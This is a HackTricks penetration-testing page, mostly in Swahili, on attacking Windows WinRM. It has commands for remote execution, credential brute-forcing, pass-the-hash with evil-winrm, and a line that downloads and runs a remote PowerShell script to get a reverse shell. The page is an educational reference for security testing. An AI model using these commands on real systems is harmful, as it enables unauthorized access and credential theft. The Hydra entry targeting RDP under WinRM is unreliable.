hacktricks/network-services-pentesting/5985-5986-pentesting-winrm.md

15 KiB
Raw Blame History

5985,5986 - Pentesting WinRM

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}

Join HackenProof Discord server to communicate with experienced hackers and bug bounty hunters!

Hacking Insights
Engage with content that delves into the thrill and challenges of hacking

Real-Time Hack News
Keep up-to-date with fast-paced hacking world through real-time news and insights

Latest Announcements
Stay informed with the newest bug bounties launching and crucial platform updates

Join us on Discord and start collaborating with top hackers today!

WinRM

Windows Remote Management (WinRM) inasisitizwa kama protokali na Microsoft inayowezesha usimamizi wa mbali wa mifumo ya Windows kupitia HTTP(S), ikitumia SOAP katika mchakato. Kimsingi inasukumwa na WMI, ikijitokeza kama kiolesura cha HTTP kwa shughuli za WMI.

Uwepo wa WinRM kwenye mashine unaruhusu usimamizi wa mbali kwa urahisi kupitia PowerShell, kama vile SSH inavyofanya kwa mifumo mingine ya uendeshaji. Ili kubaini ikiwa WinRM inafanya kazi, inashauriwa kuangalia ufunguzi wa bandari maalum:

  • 5985/tcp (HTTP)
  • 5986/tcp (HTTPS)

Bandari iliyo wazi kutoka kwenye orodha hapo juu inaashiria kuwa WinRM imewekwa, hivyo kuruhusu majaribio ya kuanzisha kikao cha mbali.

Kuanzisha Kikao cha WinRM

Ili kuunda PowerShell kwa WinRM, cmdlet ya Microsoft Enable-PSRemoting inakuja katika hatua, ikiseti kompyuta kukubali amri za PowerShell za mbali. Kwa ufikiaji wa juu wa PowerShell, amri zifuatazo zinaweza kutekelezwa ili kuwezesha kazi hii na kutaja mwenyeji yeyote kama wa kuaminika:

Enable-PSRemoting -Force
Set-Item wsman:\localhost\client\trustedhosts *

Hii mbinu inahusisha kuongeza wildcard kwenye usanidi wa trustedhosts, hatua ambayo inahitaji kuzingatia kwa makini kutokana na athari zake. Pia inabainishwa kwamba kubadilisha aina ya mtandao kutoka "Public" hadi "Work" huenda ikawa muhimu kwenye mashine ya mshambuliaji.

Zaidi ya hayo, WinRM inaweza kuzinduliwa kwa mbali kwa kutumia amri ya wmic, kama inavyoonyeshwa hapa:

wmic /node:<REMOTE_HOST> process call create "powershell enable-psremoting -force"

Hii mbinu inaruhusu kuweka WinRM kwa mbali, ikiongeza ufanisi katika kusimamia mashine za Windows kutoka mbali.

Thibitisha ikiwa imewekwa

Ili kuthibitisha usanidi wa mashine yako ya shambulio, amri ya Test-WSMan inatumika kuangalia ikiwa lengo lina WinRM imewekwa ipasavyo. Kwa kutekeleza amri hii, unapaswa kutarajia kupokea maelezo kuhusu toleo la itifaki na wsmid, ikionyesha usanidi uliofanikiwa. Hapa chini kuna mifano inayoonyesha matokeo yanayotarajiwa kwa lengo lililo na usanidi dhidi ya lile lisilo na usanidi:

  • Kwa lengo ambalo limewekwa ipasavyo, matokeo yataonekana kama ifuatavyo:
Test-WSMan <target-ip>

Majibu yanapaswa kuwa na habari kuhusu toleo la itifaki na wsmid, ikionyesha kwamba WinRM imewekwa vizuri.

  • Kwa upande mwingine, kwa lengo sio lililowekwa kwa WinRM, matokeo yatakuwa hakuna habari kama hizo za kina, ikionyesha ukosefu wa usanidi mzuri wa WinRM.

Teua amri

Ili kutekeleza ipconfig kwa mbali kwenye mashine ya lengo na kuona matokeo yake fanya:

Invoke-Command -computername computer-name.domain.tld -ScriptBlock {ipconfig /all} [-credential DOMAIN\username]

Unaweza pia kutekeleza amri ya console yako ya PS ya sasa kupitia Invoke-Command. Fikiria kwamba una kazi inayoitwa enumeration kwenye kompyuta yako na unataka kuitekeleza kwenye kompyuta ya mbali, unaweza kufanya:

Invoke-Command -ComputerName <computername> -ScriptBLock ${function:enumeration} [-ArgumentList "arguments"]

Teua Skripti

Invoke-Command -ComputerName <computername> -FilePath C:\path\to\script\file [-credential CSCOU\jarrieta]

Pata reverse-shell

Invoke-Command -ComputerName <computername> -ScriptBlock {cmd /c "powershell -ep bypass iex (New-Object Net.WebClient).DownloadString('http://10.10.10.10:8080/ipst.ps1')"}

Pata kikao cha PS

Ili kupata shell ya PowerShell ya mwingiliano tumia Enter-PSSession:

#If you need to use different creds
$password=ConvertTo-SecureString 'Stud41Password@123' -Asplaintext -force
## Note the ".\" in the suername to indicate it's a local user (host domain)
$creds2=New-Object System.Management.Automation.PSCredential(".\student41", $password)

# Enter
Enter-PSSession -ComputerName dcorp-adminsrv.dollarcorp.moneycorp.local [-Credential username]
## Bypass proxy
Enter-PSSession -ComputerName 1.1.1.1 -Credential $creds -SessionOption (New-PSSessionOption -ProxyAccessType NoProxyServer)
# Save session in var
$sess = New-PSSession -ComputerName 1.1.1.1 -Credential $creds -SessionOption (New-PSSessionOption -ProxyAccessType NoProxyServer)
Enter-PSSession $sess
## Background current PS session
Exit-PSSession # This will leave it in background if it's inside an env var (New-PSSession...)

Kikao kitaendesha katika mchakato mpya (wsmprovhost) ndani ya "mhasiriwa"

Kulazimisha WinRM Kufunguka

Ili kutumia PS Remoting na WinRM lakini kompyuta haijasanidiwa, unaweza kuifungua kwa:

.\PsExec.exe \\computername -u domain\username -p password -h -d powershell.exe "enable-psremoting -force"

Saving and Restoring sessions

Hii haitafanya kazi ikiwa lugha ime punguzia kwenye kompyuta ya mbali.

#If you need to use different creds
$password=ConvertTo-SecureString 'Stud41Password@123' -Asplaintext -force
## Note the ".\" in the suername to indicate it's a local user (host domain)
$creds2=New-Object System.Management.Automation.PSCredential(".\student41", $password)

#You can save a session inside a variable
$sess1 = New-PSSession -ComputerName <computername> [-SessionOption (New-PSSessionOption -ProxyAccessType NoProxyServer)]
#And restore it at any moment doing
Enter-PSSession -Session $sess1

Ndani ya kikao hiki unaweza kupakia skripti za PS kwa kutumia Invoke-Command

Invoke-Command -FilePath C:\Path\to\script.ps1 -Session $sess1

Errors

Ikiwa unapata kosa lifuatalo:

enter-pssession : Kuunganisha na seva ya mbali 10.10.10.175 kumeshindikana na ujumbe wa kosa ufuatao : Mteja wa WinRM haiwezi kushughulikia ombi. Ikiwa mpango wa uthibitishaji ni tofauti na Kerberos, au ikiwa kompyuta ya mteja haijajiunga na eneo, basi usafiri wa HTTPS lazima utumike au mashine ya marudio lazima iongezwe kwenye mipangilio ya TrustedHosts. Tumia winrm.cmd kuunda mipangilio ya TrustedHosts. Kumbuka kwamba kompyuta katika orodha ya TrustedHosts zinaweza kutothibitishwa. Unaweza kupata maelezo zaidi kuhusu hilo kwa kuendesha amri ifuatayo: winrm help config. Kwa maelezo zaidi, angalia mada ya msaada ya about_Remote_Troubleshooting.

Jaribu kwenye mteja (habari kutoka hapa):

winrm quickconfig
winrm set winrm/config/client '@{TrustedHosts="Computer1,Computer2"}'

Jiunge na HackenProof Discord server ili kuwasiliana na hackers wenye uzoefu na wawindaji wa bug bounty!

Uelewa wa Hacking
Shiriki na maudhui yanayochunguza msisimko na changamoto za hacking

Habari za Hack kwa Wakati Halisi
Endelea kuwa na habari kuhusu ulimwengu wa hacking kwa kupitia habari na uelewa wa wakati halisi

Matangazo Mapya
Baki na habari kuhusu bug bounties mpya zinazozinduliwa na masasisho muhimu ya jukwaa

Jiunge nasi kwenye Discord na uanze kushirikiana na hackers bora leo!

WinRM connection in linux

Brute Force

Kuwa makini, brute-forcing winrm kunaweza kuzuia watumiaji.

#Brute force
crackmapexec winrm <IP> -d <Domain Name> -u usernames.txt -p passwords.txt

#Just check a pair of credentials
# Username + Password + CMD command execution
crackmapexec winrm <IP> -d <Domain Name> -u <username> -p <password> -x "whoami"
# Username + Hash + PS command execution
crackmapexec winrm <IP> -d <Domain Name> -u <username> -H <HASH> -X '$PSVersionTable'
#Crackmapexec won't give you an interactive shell, but it will check if the creds are valid to access winrm

Kutumia evil-winrm

gem install evil-winrm

Soma nyaraka zake kwenye github: https://github.com/Hackplayers/evil-winrm

evil-winrm -u Administrator -p 'EverybodyWantsToWorkAtP.O.O.'  -i <IP>/<Domain>

Ili kutumia evil-winrm kuungana na anwani ya IPv6, tengeneza kipengee ndani ya /etc/hosts kuweka jina la kikoa kwa anwani ya IPv6 na uungane na kikoa hicho.

Pita hash na evil-winrm

evil-winrm -u <username> -H <Hash> -i <IP>

Kutumia mashine ya PS-docker

docker run -it quickbreach/powershell-ntlm
$creds = Get-Credential
Enter-PSSession -ComputerName 10.10.10.149 -Authentication Negotiate -Credential $creds

Kutumia skripti ya ruby

Msimbo umetolewa hapa: https://alamot.github.io/winrm_shell/

require 'winrm-fs'

# Author: Alamot
# To upload a file type: UPLOAD local_path remote_path
# e.g.: PS> UPLOAD myfile.txt C:\temp\myfile.txt
# https://alamot.github.io/winrm_shell/


conn = WinRM::Connection.new(
endpoint: 'https://IP:PORT/wsman',
transport: :ssl,
user: 'username',
password: 'password',
:no_ssl_peer_verification => true
)


class String
def tokenize
self.
split(/\s(?=(?:[^'"]|'[^']*'|"[^"]*")*$)/).
select {|s| not s.empty? }.
map {|s| s.gsub(/(^ +)|( +$)|(^["']+)|(["']+$)/,'')}
end
end


command=""
file_manager = WinRM::FS::FileManager.new(conn)


conn.shell(:powershell) do |shell|
until command == "exit\n" do
output = shell.run("-join($id,'PS ',$(whoami),'@',$env:computername,' ',$((gi $pwd).Name),'> ')")
print(output.output.chomp)
command = gets
if command.start_with?('UPLOAD') then
upload_command = command.tokenize
print("Uploading " + upload_command[1] + " to " + upload_command[2])
file_manager.upload(upload_command[1], upload_command[2]) do |bytes_copied, total_bytes, local_path, remote_path|
puts("#{bytes_copied} bytes of #{total_bytes} bytes copied")
end
command = "echo `nOK`n"
end
output = shell.run(command) do |stdout, stderr|
STDOUT.print(stdout)
STDERR.print(stderr)
end
end
puts("Exiting with code #{output.exitcode}")
end

Shodan

  • port:5985 Microsoft-HTTPAPI

Marejeo

HackTricks Amri za Otomatiki

Protocol_Name: WinRM    #Protocol Abbreviation if there is one.
Port_Number:  5985     #Comma separated if there is more than one.
Protocol_Description: Windows Remote Managment        #Protocol Abbreviation Spelled out

Entry_1:
Name: Notes
Description: Notes for WinRM
Note: |
Windows Remote Management (WinRM) is a Microsoft protocol that allows remote management of Windows machines over HTTP(S) using SOAP. On the backend it's utilising WMI, so you can think of it as an HTTP based API for WMI.

sudo gem install winrm winrm-fs colorize stringio
git clone https://github.com/Hackplayers/evil-winrm.git
cd evil-winrm
ruby evil-winrm.rb -i 192.168.1.100 -u Administrator -p MySuperSecr3tPass123!

https://kalilinuxtutorials.com/evil-winrm-hacking-pentesting/

ruby evil-winrm.rb -i 10.10.10.169 -u melanie -p 'Welcome123!' -e /root/Desktop/Machines/HTB/Resolute/
^^so you can upload binary's from that directory        or -s to upload scripts (sherlock)
menu
invoke-binary `tab`

#python3
import winrm
s = winrm.Session('windows-host.example.com', auth=('john.smith', 'secret'))
print(s.run_cmd('ipconfig'))
print(s.run_ps('ipconfig'))

https://book.hacktricks.xyz/pentesting/pentesting-winrm

Entry_2:
Name: Hydra Brute Force
Description: Need User
Command: hydra -t 1 -V -f -l {Username} -P {Big_Passwordlist} rdp://{IP}

Jiunge na HackenProof Discord server ili kuwasiliana na hackers wenye uzoefu na wawindaji wa makosa!

Maoni ya Udukuzi
Shiriki na maudhui yanayochunguza msisimko na changamoto za udukuzi

Habari za Udukuzi za Wakati Halisi
Endelea kuwa na habari kuhusu ulimwengu wa udukuzi kwa kupitia habari na maoni ya wakati halisi

Matangazo Mapya
Baki na habari kuhusu makosa mapya yanayoanzishwa na masasisho muhimu ya jukwaa

Jiunge nasi kwenye Discord na uanze kushirikiana na hackers bora leo!

{% hint style="success" %} Jifunze na fanya mazoezi ya Udukuzi wa AWS:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya Udukuzi wa GCP: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}